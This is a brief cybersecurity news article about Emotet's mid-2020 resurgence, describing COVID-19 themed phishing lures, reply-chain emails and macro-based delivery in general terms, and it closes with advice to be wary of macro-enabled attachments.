Emotet malware had been dormant between February 2020 to mid-July 2020. Now, by observing the rapid rate of updates in its features and capabilities, it seems the developers behind the botnet are planning to compensate for the lost timespan by making back to back updates in its attack tactics.

Making the headline

Recently, Emotet was found using COVID-19 related lures to target its victims in the US.
  • A security researcher has identified COVID-19 themed phishing email that pretends to be from the 'California Fire Mechanics' but instead distributes Emotet payloads.
  • In these campaign, the Emotet operators have been using an email stolen from previous victims rather than creating a new phishing lure. The operators have been observed using reply-chain emails sent to a number of addresses.
  • The spam emails lure the victims to enable the macros, which would eventually execute a PowerShell command to download the Emotet malware executable from one of three to four predefined sites.

The antiquity of the trend

Emotet operators have followed the pattern of spamming COVID-19 themed spam to distribute malware in earlier attacks also. At the outset of the coronavirus pandemic in January, a malspam campaign was seen spreading Emotet using coronavirus infection reports as a lure, targeting users in various Japanese prefectures, including Gifu, Osaka, and Tottori.

Recent highlights

According to the Check Point’s Global Threat Index for July 2020, Emotet has surged back to the first place, impacting 5% of organizations globally.
  • Earlier this month, signatures of the Emotet malware were found in the clickbait links posted on UNESCO’s E-team webpage, which is used for sharing knowledge by fellow policy practitioners.
  • Within the same week, Emotet was also found using stolen emails with legitimate attachments to target its victims.

The bottom line

After using all innovative tricks and tactics within such a short duration, the ultimate goal of Emotet malware still remains to steal sensitive user information and install secondary payloads, such as TrickBot, Qbot, or other malware. Therefore, one needs to be vigilant when opening unknown emails and attachments, particularly those containing documents requiring you to enable macros in Microsoft Office.

Cyware Publisher